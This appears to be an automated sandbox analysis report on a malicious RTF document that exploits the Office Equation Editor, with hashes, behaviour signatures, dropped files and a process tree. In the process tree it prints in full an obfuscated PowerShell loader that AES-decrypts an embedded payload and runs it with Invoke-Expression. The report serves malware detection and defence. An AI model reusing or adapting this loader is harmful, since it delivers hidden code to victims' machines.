Analysis
max time kernel: 100s
max time network: 34s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 19-07-2024 07:03
Static task: static1
Behavioral task: behavioral1
  Sample: e677d8183d89a410a3ce59db5a2722d3.rtf
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: e677d8183d89a410a3ce59db5a2722d3.rtf
  Resource: win10v2004-20240709-en
General
Target: e677d8183d89a410a3ce59db5a2722d3.rtf
Size: 90KB
MD5: e677d8183d89a410a3ce59db5a2722d3
SHA1: 969255020b8e5b9cf16ffa6dd7c8f931e7b68ce7
SHA256: 5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2
SHA512: 8f7369c3de05953613c246a1312a6ccfb6c416e458ddd55efdfb96c0ef569832aea51a52527fbfd5f7c36e1613c59358c425e5d8cdbf51d5bf4fb63a2bc16cc5
SSDEEP: 384:Vgn/TJl/8FdlK+gqigv0C7xAlEM5jUbTMbyi9thdIhFRi2mnk0PKk6Ut6jvWdlKv:YuF22+iM5jZbyShdIjFJu2
Malware Config
Signatures

Blocklisted process makes network request 7 IoCs
Processes:
  flow  pid   process
  3     2548  EQNEDT32.EXE
  7     2816  WScript.exe
  9     2816  WScript.exe
  11    600   powershell.exe
  12    600   powershell.exe
  13    600   powershell.exe
  14    600   powershell.exe
Drops file in System32 directory 1 IoCs
Processes:
  process         description                   ioc
  powershell.exe  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Drops file in Windows directory 1 IoCs
Processes:
  process      description                   ioc
  WINWORD.EXE  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid   process
  2220  WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
  pid  process
  600  powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  description               pid  process
  Token: SeDebugPrivilege   600  powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
  pid   process
  2220  WINWORD.EXE
  2220  WINWORD.EXE
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
  description                        pid   process       target process
  PID 2548 wrote to memory of 2816   2548  EQNEDT32.EXE  WScript.exe
  PID 2548 wrote to memory of 2816   2548  EQNEDT32.EXE  WScript.exe
  PID 2548 wrote to memory of 2816   2548  EQNEDT32.EXE  WScript.exe
  PID 2548 wrote to memory of 2816   2548  EQNEDT32.EXE  WScript.exe
  PID 2816 wrote to memory of 600    2816  WScript.exe   powershell.exe
  PID 2816 wrote to memory of 600    2816  WScript.exe   powershell.exe
  PID 2816 wrote to memory of 600    2816  WScript.exe   powershell.exe
  PID 2816 wrote to memory of 600    2816  WScript.exe   powershell.exe
  PID 2220 wrote to memory of 1644   2220  WINWORD.EXE   splwow64.exe
  PID 2220 wrote to memory of 1644   2220  WINWORD.EXE   splwow64.exe
  PID 2220 wrote to memory of 1644   2220  WINWORD.EXE   splwow64.exe
  PID 2220 wrote to memory of 1644   2220  WINWORD.EXE   splwow64.exe
Processes

1. C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e677d8183d89a410a3ce59db5a2722d3.rtf"
   - Drops file in Windows directory
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\splwow64.exe
      Command line: C:\Windows\splwow64.exe 12288

1. C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
   Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
   - Blocklisted process makes network request
   - Launches Equation Editor
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS"
      - Blocklisted process makes network request
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (image path and command line follow)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI49958097433743076509724959814142CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnIbxuRBZW58D6qHa6OaTz/wPo2erEU3a8XHWrkXAdbdzTC5T84fuiWq58k3i/POU4yNFit1HabT7Ip/uUGVBt4z8Uo7htAUUgjHEN/nsapjY6CPUspvGVUGHssU+Pr5nnVpAZRUrtIGtx098n/onUN4/9UdxjeWta56320IcuEKx5FBRF8BN5agrfzcPl8nWFJaCYbxALQD0pd8wcDcG7Z4qp//WpU8YzhhoHcmfr6tHPpzTEfbrZwiVOvuw+/JvzsrMeYk7zZu+UUshFBQ5tqcmHnYcNcKNeVyySh7vbF4dtVBPC59rcDf45Ip8e8qgnf+f59F72C6X8w7BKmWcxDrvkgIJEdDAL8hj2Jkhtpz0sR4L4aVrWtEQPJ8yxgXf1T2rm+XpdfVfU+ukTx19Jz3wEIAgQSafjf0GfBAL3e4NWDVLet9944vxSiJB8xEd7JenGiyEOtI3Y3hprPXCw66eWQhoF3a145gY3Z2R4BogKZJ5gqp0EKkBqBT9JxAuN4bfZO+TSndIjmga9njg4/qNNYfeYV/uMRKhd+jYkkLNLrx6xGX9qi7fRuFbBprznkr12YuC7yJFQ2x0WsaX8X99Ti2tR/xVNE4EhJ7YWvD7ep2zjQ2woL0IBVZZWRC5I63PpIH400MNDUg8N135wf5JXMORFTBbnzE6SBNiXK6moSaSigUyIRhCN3MyxeECsYo51cbZ/6yqA6VLl9UwtSXFZkT6jsXN4VfMfanH4oR0pi+fnhBmdC+kor0H1eu3doM8tnX5jwkbA3g5RpVHVTwpCCiK/Odz2S8a2CmmJm46STR0hWNzn3oQo1Kld1xQ+1H8hCRSAJvVgqx0wbyv5ng74HSF/sOKduVg5TOulc0bAM2XZNa3NBd2k22BRcCPbE8qhywR0mDi7halZQFXAg8MkRAO0IpVULqcOhikrF+vgmdDw5nxwkSQghmqNulszxeC3Zk9uOC9fO9U2Om796d5NxN0o1Pe2Q7NqhzvPLHu7e5uzSTM6IOxVwRS1jI2X4kkSFKPx5pphUxpLEKB7kQwodoqK5/vSNq9DQIjN4kBA2oWI4BLdmL0+z+59rwTBW487/tVZMEyOa07ecYQeUh66aUseTs5+7zOjmEKrPtKQvkMDJnbAJKX385iV8MzoKGDBarEeSHT3Juol3DEq2A8RWkZdNDTL9gnFsG8rzPUewwTYqHynUuMh5CvZ/ZY0xv/HckoVxNKNGiY5Lzzih8SGOjMqMrXQPiaM+gvZbG3wf2VQkwyAEOH5p54L4m5O5omGT+jAdZzINuqShbK3l0wnwvp/1xtT8MQUezvxMnbqY70jjYLzsmxU+mqfUDhefKjgph7AlvQ909Z5XJmZnneYUGHW/2eWRp9MDZ+jWBNcUhGoUshHAdJ9QTrZSjBiXRG6ahqVSqrmyPd9m1isTmsd2uwpnR/Vv3sDR0Rpa6wRvf3FwwoHMJu7X9zC+Tub3ZCRtEYLoN5hNYt4Ci5ibCNjKAfPWHRBkhpXGJ4vxdNdesz33k4eAkMZFnBRlmUTdq+SY9gKxwq+9Pt2oCH8n9g9JSH93H57AAoPSteAmN+kM8YADHtLsjfKI1n/gboID0K3ci8Im+jLfaq/isIkAQtaFeepycXL9kn3HexD3NbJAn6fY0OQ8fIAKm2bi+W0vdvcXgrjypy+pLfd9B7bUz22aDOxkoZTFdRt1nVGbdgC2CCcFMLqM+ONKbDKmg2i1b2PUwPHKEMYrCPj33PxTJx0uYF6FcTqZWr1FunIOIXGkRF6YnlxA91J0qtZED4hJCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: 
TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0E1IWGZ4\paste1[1].txt
  Filesize: 156B
  MD5: ad6c37ef980373e9bcbd14810fad34bc
  SHA1: 9c061a1b3608b7c7f1db7cd06c8246913ee11bda
  SHA256: ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
  SHA512: 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
  Filesize: 19KB
  MD5: 738d5c97694a93b817cb45a8e6e20264
  SHA1: 471751e0f3c5841ec2b01dec13883c269f6530b3
  SHA256: cb0930eadf347431ceb1d357b9a9736932106e8031185532860bf836b6d5074e
  SHA512: 2487aa8e595ab153c229c8fcbce531a8639d4054136a1a543a2983804ef2a004e0301ac7af15e1a8b6aa85568174073abbb1a2ec0a2a6310fe851da0266e2273

C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS
  Filesize: 123KB
  MD5: 612b79418bc9dee5e9bf503df55a245c
  SHA1: 8211185d8e6f152a269325a6cb30c361fcbb60b3
  SHA256: 154365daa42baad94fe2c6de17859212e407767de8f9e8e12c69b9623b63a7a0
  SHA512: 05ef1aebdd3b9f2255f7d198c18d498e5b021f89444a8679a84fc6d01e61720e1af7216444231aff52ea3811fb12715f1ac556dd7347346f9a2c12eb27a5fb02

memory/2220-0-0x000000002F991000-0x000000002F992000-memory.dmp
  Filesize: 4KB

memory/2220-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
  Filesize: 64KB

memory/2220-2-0x000000007118D000-0x0000000071198000-memory.dmp
  Filesize: 44KB

memory/2220-39-0x000000007118D000-0x0000000071198000-memory.dmp
  Filesize: 44KB

memory/2220-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
  Filesize: 64KB